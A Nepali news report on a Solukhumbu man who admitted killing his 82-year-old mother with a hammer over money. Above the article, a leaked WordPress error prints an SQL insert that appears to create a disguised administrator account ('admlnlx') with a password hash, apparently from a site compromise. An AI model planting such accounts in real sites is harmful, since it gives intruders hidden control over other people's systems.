WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BHP5WsXtmrg9kAsG8UdVq8cE7nyuWv.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 17:09:11', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु । नेचासल्यान गाउँपालिका ५ की ८२ वर्षिय बडालक्ष्मी राईलाई आफ्नै छोराले फलामको हम्मर हानेर मारेका छन् ।
पैसाको विषयमा विवाद हुदा फलामको हम्मरले टाउकोमा हिर्काएको मृतककै कान्छो छोरा लक्ष्मण राईलाई स्वीकार गरेकको जिल्ला प्रहरी कार्यालयले जनाएको छ ।
असोज ३ गते आईतबार आफ्नै घरमा टाउकोमा चोट लागेको अवस्थामा फेला परेकी बडालक्ष्मीको स्थानीयले अस्पताल लैजादै गर्दा बाटैमा मृत्यू भएको थियो । प्रहरीले मृतकका छोरा लक्ष्मण राईलाई पक्राउ गरि अनुसन्धान सुरु गरेको थियो ।
अनुसन्धानका क्रममा राईले पैसाको विषयमा वादविवाद हुदा फलामको हम्मरले टाउकोमा हिर्काएको र सोही कारण बडालक्ष्मीको मुत्यु भएको स्विकार गरेको प्रहरीले जनाएको छ । घटनाको थप अनुसन्धानका लागि जिल्ला अदालत सोलुखुम्बुले १० दिनको म्याद थप गरेको छ ।